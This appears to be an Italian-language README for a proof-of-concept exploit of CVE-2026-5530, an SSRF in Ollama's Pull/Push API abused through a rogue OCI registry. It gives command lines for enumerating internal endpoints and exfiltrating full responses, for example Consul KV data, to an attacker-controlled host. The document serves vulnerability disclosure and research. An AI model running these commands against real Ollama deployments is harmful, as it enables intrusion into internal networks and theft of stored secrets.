
Proof-of-concept exploit per CVE-2026-5530, una SSRF nell'API Pull/Push di Ollama, che consente l'enumerazione di endpoint interni e l'esfiltrazione completa delle risposte tramite un registro OCI rogue.
SSRF su Ollama tramite reindirizzamento del registro OCI con esfiltrazione completa della risposta.
Writeup: https://davidrochester.com/posts/cve-2026-5530
Ollama è stato contattato più volte senza ricevere risposta.
Tre modalità: enum, exfil e probe.
Trova endpoint interni attivi raggiungibili dall'host Ollama.
python3 poc.py targets.txt --registry-host <your-ip>
Esfiltra le risposte SSRF quando conosci la dimensione della risposta.
python3 poc.py http://internal:8500/v1/kv/?recurse --exfil --size 960 --registry-host <your-ip>
Cerca automaticamente la dimensione della risposta con ricerca binaria, poi esfiltra.
python3 poc.py http://internal:8500/v1/kv/?recurse --probe --registry-host <your-ip>
target URL o file di URL (uno per riga, # per commenti)
-p, --port porta del registro rogue (default: 9999)
--exfil-port porta del registro di esfiltrazione (default: 10000)
--exfil modalità esfil, richiede --size
--probe ricerca binaria per la dimensione, poi esfil
--size Content-Length (richiesto con --exfil)
--registry-host il tuo IP/hostname dell'attaccante che Ollama può raggiungere
--ollama URL API Ollama (default: http://127.0.0.1:11434)